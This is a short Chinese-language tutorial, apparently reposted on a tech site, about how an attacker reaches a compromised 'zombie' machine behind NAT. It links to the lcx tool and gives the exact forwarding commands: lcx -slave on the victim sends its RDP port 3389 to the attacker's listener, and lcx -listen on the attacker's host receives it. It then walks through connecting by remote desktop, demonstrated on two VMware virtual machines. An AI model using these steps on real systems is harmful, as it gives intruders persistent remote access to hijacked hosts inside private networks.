您好,登錄后才能下訂單哦!
內網中的主機一般都是使用私有IP,在網絡出口處經過NAT轉換為公網IP之后,才能訪問Internet。在這種網絡結構下,通信雙方之間實現的是單向訪問,即只有內網中的主機可以主動訪問Internet中的主機,反之則不行。如果在內網中架設了一臺服務器,又需要允許Internet中的用戶訪問這臺服務器,那么就必須在網絡出口處進行端口映射。
在網絡***中,如果捕獲了一臺位于內網中的肉雞,那么***是無法主動去連接這臺肉雞的,而且也不可能在人家的網絡出口做端口映射,這時就可以用到lcx這個小工具了。下載地址:http://down.51cto.com/data/1878979
Lcx可以實現端口轉發,將肉雞A上的某個端口(如3389)轉發到具有公網地址的主機B上,這樣***只需連接主機B的3389端口就相當于連接到了肉雞A上,從而突破了內網私有IP的限制。
下面在vmware中利用2臺虛擬機來模擬操作,一臺虛擬機作為***主機(IP地址192.168.80.128),另一臺虛擬機作為肉雞(IP地址192.168.80.129)。
首先將lcx分別放到這兩臺虛擬機的C盤根目錄下,首先在肉雞上執行命令“lcx –slave 192.168.80.128 5000 192.168.80.129 3389”,也就是將192.168.80.129上的3389端口轉發到192.168.80.128上的5000端口。
然后再到***主機上執行命令“lcx –listen 5000 3389”,也就是在5000端口上監聽,并將收到的數據轉發到自己的3389端口上。此時在***主機上執行“netstat –an”命令,可以看到同時開放了5000和3389兩個端口。
最后在***主機上打開mstsc,只需輸入自己的IP地址(192.168.80.128或是127.0.0.1)便可以連接到肉雞上了,從而實現內網突破。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。